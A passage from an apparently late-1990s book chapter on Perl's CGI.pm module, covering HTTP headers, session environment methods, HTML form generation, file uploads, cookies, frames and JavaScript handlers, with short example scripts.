      print $cgi->header( -type => 'text/html',
                        -status => '203 Non-Authoritative Information');

-expires
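Generally, browsers don't cache the results of CGI programs, but some naughty browsers might, and proxy servers sometimes do as well. You can limit how long such dynamically generated pages are cached by giving -expires either an absolute date or a time relative to now:

      +30s                               30 seconds from now
      +10m                               10 minutes from now
      +1h                                1 hour from now
      -1d                                yesterday (that is, expire immediately)
      now                                immediately
      +3M                                in 3 months
      +10y                               in 10 years
      Sunday, 25-Apr-1999 00:40:33 GMT   at the indicated time and date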

-cookie
You can use this parameter to generate a header that tells Netscape (and browsers that wish they were Netscape, like Internet Explorer) to return a cookie for each request made of this program. You can use the cookie() method to create and retrieve session cookies.
redirect()
You can send a redirection request for the remote client, which immediately goes to the specified URL. (You should always specify absolute URLs in redirections; relative URLs do not work properly.)

      print $cgi->redirect('http://my.other.server/and/then/some/path');

HTTP Session Variables

Most of the environment variables that you use in creating CGI programs, including the ones discussed at the beginning of this chapter, are available through this interface. A list of methods follows, along with a brief description of each.

accept()
This method returns the list of MIME types that the remote client accepts. If you give this method a MIME type as an argument (for example, $cgi->accept('image/gif')), it returns a floating-point value ranging from 0.0 ("Don't want it") to 1.0 ("Okay, I'll take that") that tells you how much the browser wants that type.
auth_type()
If the page is protected by an authentication scheme, the authorization type is returned. In HTTP/1.0, the only possible type of authentication is "basic". In HTTP/1.1, this could be either "basic" or "digest". Other server-specific schemes might be possible; consult your HTTP server's documentation to be sure.
raw_cookie()
This method returns a Netscape magic cookie in its raw state. Typically, you can perform any cookie manipulation that you might want to do at a higher level via the cookie() method.
path_info()
This method returns any path information that has been appended to your program in the HTTP request. For example, if your program performs redirects, and it is invoked using the path /cgi-bin/programname/some/other/path, then path_info() returns /some/other/path.
path_translated()
This method is the same as path_info(), except that the extra path information is translated into a physical pathname on the server, such as /var/www/htdocs/some/other/path.
query_string()
This method returns the query string, that is, the part of the URL that follows the question mark. This information could include options and arguments that you might use for maintaining state information.
referer()
This method returns the URL of the page that linked the user to your program.
remote_addr()
This method returns the IP address of the remote host (that is, the client) in dotted-quad form.
remote_ident()
This method returns the identity of the person on the remote host making the request. This method works only if the remote system has the identd service running.
remote_host()
This method returns the name of the remote host, if it is known. Otherwise, it returns the IP address.
remote_user()
This method returns the name of the user who has been authenticated on your server.
request_method()
This method returns the HTTP method used to request your program's URL (for example, GET, POST, or HEAD).
script_name()
This method returns the program name as a partial URL. This method is useful for programs that reference themselves.
server_name()
This method returns the name of the server on which the program is running.
server_port()
This method returns the port number that the local Web server is using.
user_agent()
This method returns the remote user's client software identification. You might be interested in watching this response to see how many browsers claim to be Mozilla (Netscape Navigator).
user_name()
This method returns the remote user's name. This method typically doesn't work, although it does work on some older browsers such as early versions of NCSA Mosaic.
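
Here is a small sketch of a few of these methods in action. Because it is meant to run outside a Web server, it fills in %ENV by hand first. The request details (the path, the color parameter, the address, and the browser name) are invented for the example; in a real CGI program, the server sets them for you.

```perl
use strict;
use warnings;
use CGI;

# Assumptions: stand-ins for what the Web server would put in the
# environment for GET /cgi-bin/programname/some/other/path?color=red
$ENV{REQUEST_METHOD}  = 'GET';
$ENV{SCRIPT_NAME}     = '/cgi-bin/programname';
$ENV{PATH_INFO}       = '/some/other/path';
$ENV{QUERY_STRING}    = 'color=red';
$ENV{REMOTE_ADDR}     = '192.0.2.10';
$ENV{HTTP_USER_AGENT} = 'Mozilla/4.0 (example)';

my $cgi = CGI->new;

my $method = $cgi->request_method;   # how the program was requested
my $path   = $cgi->path_info;        # extra path after the program name
my $addr   = $cgi->remote_addr;      # client address, dotted quad
my $agent  = $cgi->user_agent;       # what the browser calls itself
my $color  = $cgi->param('color');   # one value parsed from the query string

print "method: $method\n",
      "path:   $path\n",
      "client: $addr\n",
      "agent:  $agent\n",
      "color:  $color\n";
```

Going through the methods rather than reading %ENV directly keeps your program independent of how a particular server happens to name or fill in its variables.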

HTML from `CGI.pm`

Now you're ready to look at some useful parameters to create HTML headers and the HTML document itself:

-title
This parameter indicates the title of the document. (The argument to this parameter ends up between the <TITLE> and </TITLE> tags.)
-author
This parameter indicates the author's e-mail address.
-script
You use this parameter to incorporate JavaScript into your HTML. Here you need to define all the JavaScript methods that you intend to use at the occurrence of events (such as the submission of a form, the changing of contents of a field, and so on). You learn how to invoke the methods defined here in the section on JavaScript.
CGI.pm doesn't write the JavaScript for you; it simply provides a way for you to incorporate JavaScript into your dynamically generated HTML. To do so, you need to know how to use JavaScript. Consider this example:

$cgi = new CGI;
print $cgi->header;

# The closing END of the here-document must start in the first column.
$JAVASCRIPT=<<END;
// This is a super simple example of incorporating JavaScript in a
// dynamically generated HTML page.

window.alert("Click on OK!");
END

print $cgi->start_html( -title => 'Some sort of silliness',
                       -script => $JAVASCRIPT);

Unpaired HTML Tags

You create tags that are unpaired such as <BR>, <HR>, and <P> as follows:

print $cgi->p;

Paired HTML Tags

Other tags, such as <I> and <B> are paired. You create them like this:

print $cgi->i("Here is some text to be italicized.");

You can even embed tags within tags as follows:

print $cgi->i("Here is some", $cgi->b("bold text"), "to be italicized");

Some Pitfalls to Avoid

Although you can use almost any of the HTML tags that you might expect via lowercase method calls of the same name, in some cases the names conflict with Perl's built-in functions or with methods that the CGI module already defines.

You might want to make a <TR> tag, for example, but tr() already exists in Perl as a character translator. You therefore can use TR() to generate the <TR> tag. Also, you make the <PARAM> tag via the PARAM() method because param() is a method of the CGI module itself.

HTML Fill-Out Forms

Remember, the methods for creating forms return the HTML needed to make the browser display what you want. You still need to print the strings after you get them from the methods. Also, the default values that you specify for a form are used only the first time that the program is invoked. If any values are passed via the query string, the program uses them, even if the values are blank.

You can use the param() method to set a field's value specifically if you want to do so. (You might want to use this method to ignore what might be in the query string and set it to another value you want.) If you want to force the program to use its default value for a given field, you can do so by using the -override parameter.

So, this bit of CGI

print $cgi->textfield(-name    => 'browser',
                      -default => 'Mozilla');

uses the value Mozilla in the browser text field the first time it's invoked. However, if the query string includes browser=InternetExploder, then the text field uses this value instead.

To prevent this situation from happening, you can change your CGI to look like this:

print $cgi->textfield(    -name => 'browser',
                       -default => 'Mozilla',
                      -override => 1);

Now, the text field always has the default value of Mozilla, regardless of the value in the query string.
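
The difference is easy to see side by side. The following sketch assumes that CGI.pm is installed and fakes an incoming query string of browser=Lynx by handing it to new(); in a real program, the value would come from the request.

```perl
use strict;
use warnings;
use CGI;

# Assumption: pretend the program was invoked with ?browser=Lynx
my $cgi = CGI->new('browser=Lynx');

# Without -override, the submitted value wins over the default.
my $sticky = $cgi->textfield(-name    => 'browser',
                             -default => 'Mozilla');

# With -override, the default wins over the submitted value.
my $forced = $cgi->textfield(    -name => 'browser',
                              -default => 'Mozilla',
                             -override => 1);

print "sticky: $sticky\n";
print "forced: $forced\n";
```

The first field should come out holding Lynx and the second Mozilla, which is exactly the behavior described above.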

If you want to force defaults for all fields on the page without having to specifically tell each one to override values from the query string, you can use the defaults() method to create a defaults button, or you can construct your program in such a way that it never passes a query string back to itself.

Although you can put more than one form on a page, keeping track of more than one at a time isn't easy.

Text that you pass to form elements is escaped. You therefore can use <my@email.addr>, for example, without having to worry about it being sent as is to the browser, which would think that you've just sent it a strange tag. If you need to turn off this feature (so that you can use special HTML entities such as &copy; for the © symbol), then you can do so this way:

$cgi->autoEscape(undef);

To turn the feature back on, try the following:

$cgi->autoEscape('yes');
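
As a quick check of what escaping does, this sketch generates the same field twice, once with the feature on and once with it off. It assumes that CGI.pm is installed; the field name notice and its contents are invented for the example.

```perl
use strict;
use warnings;
use CGI;

# Assumption: empty initializer, so nothing is read from the command line.
my $cgi = CGI->new('');

# Escaping is on by default, so the ampersand is turned into &amp;
my $escaped = $cgi->textfield(-name => 'notice', -default => '&copy; 1997');

# Turn escaping off, generate the field again, then turn it back on.
$cgi->autoEscape(undef);
my $raw = $cgi->textfield(-name => 'notice', -default => '&copy; 1997');
$cgi->autoEscape('yes');

print "escaped: $escaped\n";
print "raw:     $raw\n";
```

Leave escaping on unless you have a specific reason to turn it off, and turn it back on as soon as you're done; text that comes from users should never be sent out unescaped.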

`<ISINDEX>`

To create an <ISINDEX> tag, you can use the isindex() method as follows:

print $cgi->isindex($action);

Starting and Ending Forms

The startform() and endform() methods (spelled start_form() and end_form() in later releases of CGI.pm) exist so that you can start and end forms as follows:

print $cgi->startform($method, $action, $encoding);
print $cgi->endform;

Two types of encoding are available:

application/x-www-form-urlencoded
This approach is the standard way of submitting data to a server-based form.
multipart/form-data
You can use this new encoding option, introduced in Netscape 2.0, to send large files to the server. It's useful for Netscape's file upload feature within forms. You really don't need to use this encoding method if you're not going to use the file upload feature of browsers.

Additionally, you can use JavaScript in your forms by passing the -name and -onSubmit parameters. (A good use of this feature is validation of form data before submission to the server.) The JavaScript handler named in -onSubmit should return true to allow the submission; a false return value aborts it.

Creating a Text Field

The textfield() method, shown here, returns a single-line text input field. -name is the name of the field, -default is the default value for the field, -size is the size of the field in characters, and -maxlength is the maximum number of characters that can be put into the field.

print $cgi->textfield(     -name => 'hours',
                        -default => 40,
                           -size => 3,
                      -maxlength => 4);

Creating a Multi-Line Text Area

You can create a multi-line text area as follows:

print $cgi->textarea(   -name => 'comments',
                     -default => 'My, what great stuff you have!',
                        -rows => 5,
                     -columns => 50);

Password Field

password_field() is the same as textfield(), except that asterisks appear in place of the user's actual keystrokes.

File Upload Field

The following method returns a form field that prompts the user to upload a file to the Web server:

print $cgi->filefield(     -name => 'uploaded_file',
                        -default => 'Some value',
                           -size => 50,
                      -maxlength => 80);

-name is required for the field, -default is the starting value (which most browsers ignore for file fields), -size is the size of the field in characters, and -maxlength is the maximum number of characters that the field accepts.

You should use the multipart form encoding for uploading files. You can do so by using the start_multipart_form() method or by specifying $CGI::MULTIPART as the encoding type. If multipart encoding is not selected, the name of the file that the user selected for upload is available, but its contents are not.

Remember, you can use the param() method to get the name of the file. Conveniently, the filename returned is also a file handle. As a result, you can read the contents of a file that the user uploaded with code like the following:

$uploaded_file = $cgi->param('uploaded_file');

while(<$uploaded_file>) {
  print;
}

Binary data isn't too happy with this kind of while loop, though. In fact, if you want to save the user-uploaded file someplace, as you would if the user were uploading, for example, a JPEG image of a new car, you might do so with some code like this:

open(NEWFILE, ">>/some/path/to/a/file") || die "Cannot open NEWFILE: $!\n";
binmode(NEWFILE);   # keep binary data intact on systems that care
while($bytesread=read($uploaded_file, $buffer, 1024)) {
  print NEWFILE $buffer;
}
close NEWFILE;
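
If you find yourself saving uploads in more than one place, the read loop is worth wrapping in a subroutine. The following is only a sketch: copy_upload() is a name made up for this example, not part of CGI.pm, and the two in-memory file handles stand in for the uploaded file and the destination file so that you can try the code without a Web server.

```perl
use strict;
use warnings;

# Hypothetical helper: copy everything from $in to $out in 1024-byte
# chunks and return the number of bytes copied. Both arguments must be
# file handles that are already open.
sub copy_upload {
    my ($in, $out) = @_;
    binmode $in;     # no newline translation on either side
    binmode $out;
    my ($total, $buffer) = (0, '');
    while (my $bytesread = read($in, $buffer, 1024)) {
        print {$out} $buffer or die "Cannot write: $!\n";
        $total += $bytesread;
    }
    return $total;
}

# Assumption: 3000 bytes of made-up binary data play the uploaded file.
my $fake_upload = join '', map { chr($_ % 256) } 0 .. 2999;
my $saved       = '';

open(my $in,  '<', \$fake_upload) or die "Cannot open input: $!\n";
open(my $out, '>', \$saved)       or die "Cannot open output: $!\n";
my $copied = copy_upload($in, $out);
close $in;
close $out;

print "Copied $copied bytes\n";
```

In a real program, you would pass the handle returned by param() as the first argument and a handle opened on the destination file as the second.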

Pop-Up Menus

You can use the popup_menu() method to create a menu. -name is the menu's name (required). -values is an array reference containing the menu's list items (required); you can pass either an anonymous array or a reference to a named array, such as \@menu_items. -default is the name of the default menu choice (optional). -labels lets you pass an associative array reference that supplies the labels the user sees for menu items (optional); if it is unspecified, the values from -values are shown to the user.

print $cgi->popup_menu(   -name =>'menu_name',
                        -values =>['one', 'two', 'three'],
                       -default =>'three',
                        -labels =>{'one'=>'first','two'=>'second',
                                 'three'=>'third'});
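
The split between values and labels is easier to see in the generated HTML. This sketch, which assumes that CGI.pm is installed, builds the same menu from a named hash and prints the result; the hash name %labels is just a convenient choice.

```perl
use strict;
use warnings;
use CGI;

# Assumption: empty initializer, so nothing is read from the command line.
my $cgi = CGI->new('');

# Keys are the values sent back to your program; the hash values are
# what the user sees in the menu.
my %labels = (one => 'first', two => 'second', three => 'third');

my $menu = $cgi->popup_menu(   -name => 'menu_name',
                             -values => ['one', 'two', 'three'],
                            -default => 'three',
                             -labels => \%labels);

print "$menu\n";
```

When the form is submitted, your program receives one, two, or three in the menu_name parameter, never the label text.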

Scrolling Lists

The method for creating scrolling lists is, of course, scrolling_list():

print $cgi->scrolling_list(    -name=>'list_name',
                             -values=>['one', 'two', 'three'],
                            -default=>['one', 'three'],
                               -size=>4,
                           -multiple=>'true',
                             -labels=>\%labels);

-name and -values are the same as they are in pop-up menus. All other parameters are optional. -default is a list of items (or single item) to be selected by default. -size is the display size of the list. -multiple, when set to true, allows multiple selections. Otherwise, only one item can be selected at a time. -labels is the same as it is for pop-up menus.

Check Boxes

You use the checkbox() method to create standalone check boxes. If you have a group of check boxes that are logically linked together, you can use checkbox_group().

print $cgi->checkbox(   -name=>'checkbox_name',
                     -checked=>'checked',
                       -value=>'ON',
                       -label=>'Check me!');

-name is a parameter containing the name of the check box; it is the only required parameter. The check box's name is also used as a readable label next to the check box itself, unless -label specifies otherwise. -checked is set to checked if it is to be checked by default. -value specifies the value of the check box when checked. -label specifies what should appear next to the check box.

Check Box Groups

checkbox_group(), shown here, is the method you use to create a number of check boxes that are logically linked together and whose behavior can be affected by the other boxes.

print $cgi->checkbox_group(     -name=>'group_name',
                              -values=>['uno', 'dos', 'tres'],
                             -default=>'dos',
                           -linebreak=>'true',
                              -labels=>\%labels);

-name and -values, which are required, function just as they do for pop-up menus. All other parameters are optional. -default is either a list of values or the name of a single value to be checked by default. If -linebreak is set to true, line breaks are placed between the check boxes, making them appear in a vertical list. Otherwise, they are listed right next to each other on the same line. -labels is a reference to an associative array of labels for each value, just as in pop-up menus. If -nolabels is specified, no labels are printed next to the buttons.

If you want to generate an HTML 3 table with your check boxes in it, you can do so by using the -rows and -columns parameters. If these parameters are set, all the check boxes in the group are put into an HTML 3 table that uses the number of rows and columns specified. If you like, you can omit -rows, and the correct number is calculated for you (based on the value you specify in -columns). Additionally, you can use the -rowheaders and -colheaders parameters to add headings to your rows and columns. Both of these parameters expect a reference to an array of headings. They are purely decorative; they don't change how your check boxes are interpreted.

print $cgi->checkbox_group(  -name=>'group_name',
                           -values=>['sun', 'sgi', 'ibm', 'dec'],
                             -rows=>2, -columns=>2);

Radio Button Groups

You use the radio_group() method to create logical groups of radio buttons. Turning on one button in a radio group turns off all the others. As a result, -default accepts only a single value (instead of a list, as it can with check box groups). Otherwise, the methods for radio button groups are the same as for check box groups.

Submit Buttons

Forms are pretty useless unless you can submit them. So, the CGI module provides the submit() method, which is shown here. Available parameters are -name and -value. -name associates a name to a specific button. (This capability is useful when you have multiple buttons on the same page and want to differentiate them.) -value is what is passed to your program in the query string, and also appears as a label for the submit button. Both parameters are optional.

print $cgi->submit( -name=>'button_name',
                   -value=>'value');

Reset Buttons

Reset buttons are straightforward: clicking the reset button undoes whatever changes the user has made to the form and presents a fresh one for mangling.

print $cgi->reset;

Defaults Buttons

The defaults() method, shown here, resets a form to its defaults. This method is different from reset(), which just undoes whatever changes the user has made by typing in the fields. Reset buttons do not override query strings, but defaults buttons do. This difference between the two is small but important. If an argument is given, it is used as the label for the button. Otherwise, the button is labeled Defaults.

print $cgi->defaults('button_label');

Hidden Fields

The hidden() method, shown here, produces a text field that's invisible to the user. This capability is useful for passing form data from one form to another, when you don't want to clutter up the screen with information that the user doesn't need to see every time.

print $cgi->hidden(   -name=>'field_name',
                   -default=>['value1', 'value2', 'value3']);

Both parameters must be given. As in other cases, the second can be an anonymous array or a reference to a named array.

Clickable Image Buttons

So you aren't satisfied to have plain old hypertext as your link? Want to use an image instead? Then use the image_button() method as follows:

print $cgi->image_button( -name=>'button_name',
                           -src=>'/images/clickMe.gif',
                         -align=>'middle',
                           -alt=>'Click Me!');

When you use image_button(), only -name and -src are required. When the image is clicked, not only is the form submitted, but the x and y coordinates indicating where the image was clicked are also submitted via two parameters: button_name.x and button_name.y.

JavaScript Buttons

button(), shown here, creates a JavaScript button. This means that JavaScript code referenced in -onClick is executed. Note that this method doesn't work at all if the browser doesn't understand JavaScript, if the browser has this feature turned off, or if the browser is behind a firewall that filters out JavaScript.

print $cgi->button(   -name=>'big_red_button',
                     -value=>'Click Me!',
                   -onClick=>'doButton(this)');

Additional Considerations

Sometimes using Perl's print statement to send straight HTML to the client is just better. An example might be when you're implementing a table that contains information read from a file. It's probably better to use print to open the <TABLE> tag, use the methods to return the contents of the table, and then another print to close the table. Doing absolutely everything from a CGI method might be preferred by an object purist, but in practice, sometimes sticking a print statement with raw HTML in your program just makes more sense (from the standpoints of simplicity and readability).
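
A sketch of that mixed approach follows. It assumes that CGI.pm is installed, and the colon-separated records are made up to stand in for lines read from a file. The table tags are written as raw HTML, while the rows and cells come from the TR() and td() methods, with escapeHTML() protecting any special characters in the data.

```perl
use strict;
use warnings;
use CGI;

# Assumption: empty initializer, so nothing is read from the command line.
my $cgi = CGI->new('');

# Assumption: stand-ins for "vendor:count" lines read from a file.
my @records = ('sun:12', 'sgi:3', 'ibm:7', 'AT&T:5');

my $html = "<TABLE BORDER=1>\n";                # raw HTML opens the table
for my $record (@records) {
    my ($vendor, $count) = split /:/, $record;
    # td() with an array reference makes one cell per element.
    $html .= $cgi->TR($cgi->td([ $cgi->escapeHTML($vendor), $count ])) . "\n";
}
$html .= "</TABLE>\n";                          # raw HTML closes it

print $html;
```

Collecting the output in a string before printing it is a matter of taste; printing each piece as you go works just as well and uses less memory for big tables.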

Because the CGI modules are continually being enhanced, be sure to check the CGI.pm documentation for the complete list of methods, parameters, and features. You can find the documentation on the Web at

http://www.genome.wi.mit.edu/ftp/pub/software/WWW/cgi_docs.html

Netscape Cookies

Using cookies is another way to maintain state information. A cookie is simply a bit of data that contains a number of name/value pairs passed between the client and the server in the HTTP header rather than in the query string. In addition to name/value pairs, several other optional attributes exist.

The following is a sample cookie that demonstrates how to use the method:

$my_cookie = $cgi->cookie(   -name=>'myBigCookie',
                            -value=>'chocolate chip',
                          -expires=>'+5y',
                             -path=>'/cgi-bin',
                           -domain=>'.example.com',
                           -secure=>1);

print $cgi->header(-cookie=>$my_cookie);

The cookie() method creates a new cookie. Its parameters are as follows:

-name
This required parameter identifies the cookie.
-value
This parameter indicates the cookie's value. It can be a scalar value, array reference, or associative array reference.
-path
This parameter indicates the partial path in which the cookie is valid.
-domain
This parameter indicates the partial domain for which the cookie is valid.
-expires
This parameter indicates the expiration date for the cookie. The format is the same as described in the HTTP headers section.
-secure
If this parameter is set to 1, the cookie is used only in an SSL session.
Cookies created with the cookie() method must be sent in the HTTP header via the header() method as follows:

      print $cgi->header(-cookie=>$my_cookie);

You can send multiple cookies by passing an array reference to header(), naming each cookie to be sent:

print $cgi->header(-cookie=>[$cookie1, $cookie2]);

To retrieve a cookie, you can request it by name using the cookie() method without the -value parameter:

use CGI;
$cgi = new CGI;
$stuff = $cgi->cookie(-name=>'stuff');

To delete a cookie, send a blank cookie with the same name as the one you want to delete, and set the expiration date to something in the past.

Note that cookies have some limitations. The client cannot store more than 300 cookies at any one time. Each cookie cannot be any longer than four kilobytes, including its name. No more than 20 cookies can be specified per domain.
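
Putting retrieval and deletion together, a minimal sketch might look like the following. It assumes that CGI.pm is installed, and it sets HTTP_COOKIE by hand to play the part of a browser returning a cookie named stuff; on a real server, that variable is filled in for you.

```perl
use strict;
use warnings;
use CGI;

# Assumption: pretend the browser sent back a cookie named "stuff".
$ENV{HTTP_COOKIE} = 'stuff=chocolate%20chip';

my $cgi = CGI->new('');

# No -value, so this call fetches the cookie instead of creating one.
my $stuff = $cgi->cookie(-name => 'stuff');

# Same name, blank value, expiration date in the past: a deletion request.
my $expired = $cgi->cookie(   -name => 'stuff',
                             -value => '',
                           -expires => '-1d');

my $header = $cgi->header(-cookie => $expired);

print "The cookie held: $stuff\n";
print $header;
```

If the original cookie was created with a -path or -domain, give the same ones when you delete it; otherwise, the browser may treat the blank cookie as a different cookie and keep the old one.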

Netscape Frames

You can support frames from within CGI.pm in two ways:

Direct the output of a program into a frame with the specified name, as follows. If the named frame doesn't exist, a new window pops up with the specified code in it.

        $cgi = new CGI;
        print $cgi->header(-target=>'_myFrame');

Provide the frame's name as an argument to the -target parameter using the start_form() method:

        print $cgi->start_form(-target=>'another_frame');

Because using frames well can be difficult, splitting the program into logical sections is often best. For example, if a page has multiple frames, making one part of the program create the frames and having a separate section of the program handle each frame might be best.

JavaScript

JavaScript is a useful interpreted language that runs inside the browser. It was introduced in Netscape version 2 as "LiveScript," but its name was almost immediately changed to JavaScript, and it was made to look similar to Java. Having code execute on the client side is nice, especially for CGI purposes, because you can perform tasks such as form validation on the client side, forcing the load of user-interface-oriented tasks to be processed on the client (where it belongs) rather than on your server (where it doesn't).

Again, using the JavaScript features of CGI.pm requires that you know JavaScript. JavaScript events are available only in cases in which they are applicable.

To register a JavaScript event handler with an HTML element, simply name the appropriate parameter, and pass it any arguments you need when calling the CGI method. For example, if you want to have a text field's contents be validated as soon as a user makes a change to it, you can do so this way:

print $cgi->textfield(    -name=>'height',
                      -onChange=>"validateHeight(this)");

Of course, for this approach to work, validateHeight() must be an existing function. You make it an existing function by incorporating it in a <SCRIPT> block by using the -script parameter to the start_html method.
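
The two halves fit together roughly as shown in this sketch, which assumes that CGI.pm is installed. The body of validateHeight() and the form's action, /cgi-bin/height, are invented for the example; any JavaScript function and any program of your own would do.

```perl
use strict;
use warnings;
use CGI;

# Assumption: empty initializer, so nothing is read from the command line.
my $cgi = CGI->new('');

# The JavaScript itself. CGI.pm only carries it into the page.
my $JAVASCRIPT = <<'END';
function validateHeight(field) {
    if (isNaN(parseInt(field.value, 10))) {
        window.alert("Please enter your height as a number.");
        field.focus();
    }
}
END

# -script places the function in the document head ...
my $page_top = $cgi->start_html( -title => 'Height check',
                                -script => $JAVASCRIPT);

# ... and -onChange names it as the handler for this field.
my $field = $cgi->textfield(    -name => 'height',
                            -onChange => 'validateHeight(this)');

print $cgi->header,
      $page_top,
      $cgi->start_form(-method => 'POST', -action => '/cgi-bin/height'),
      'Height: ', $field,
      $cgi->end_form,
      $cgi->end_html;
```

Remember that client-side checks are a convenience for the user, not a safeguard for you; your program still has to validate whatever arrives.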

Summary

Perl is an excellent language for writing CGI applications. Given its flexibility, speed, portability, and the wealth of CGI-related Perl resources available, there is very little that can't be done. Perl is used to develop the vast majority of CGI programs on the Web, and after seeing how well Perl does the job, it's easy to see why.

CGI programming is a powerful and fun way to accomplish many of the tasks relating to allowing users to interact with huge amounts of data. Information can be as dynamic or as static as you like.

As the Web becomes closer to the long-sought dream of an easy-to-use, ubiquitous user interface, using CGI to look at data makes sense rather than using the proprietary interfaces that typically exist. Because CGI is a program running on your server, though, it typically has access to data that you might not want to give to everyone. (For example, a corporate network might have a CGI interface to a certain subset of an employee database, which might also include information such as payroll, social security numbers, and so on that shouldn't be "public" knowledge.) Therefore, you need to take some precautions related to security, just to make sure that your program won't be tricked into giving out sensitive information that it otherwise wouldn't give.

The Perl community is one of the most helpful on the Net. Regardless of whether you're just learning to program or are already a wizard, a plethora of people on the comp.lang.perl.* newsgroups are willing to help you solve any problems that you're confronted with. (They won't write the programs for you, for the most part, but they'll do more than that: they'll help you figure out how to solve your own problems. So the next time, you won't have to ask anyone.) Do your part to keep the community like it is: When you see that someone is asking a question, and you can provide some help, do so. If you've written a useful module, share it.

Because of Perl's powerful regular expressions, object-oriented capabilities, and the huge library of free Perl modules to handle interfaces to various databases, CGI, encryption systems, and so on, Perl is a great language for safe and powerful CGI programming.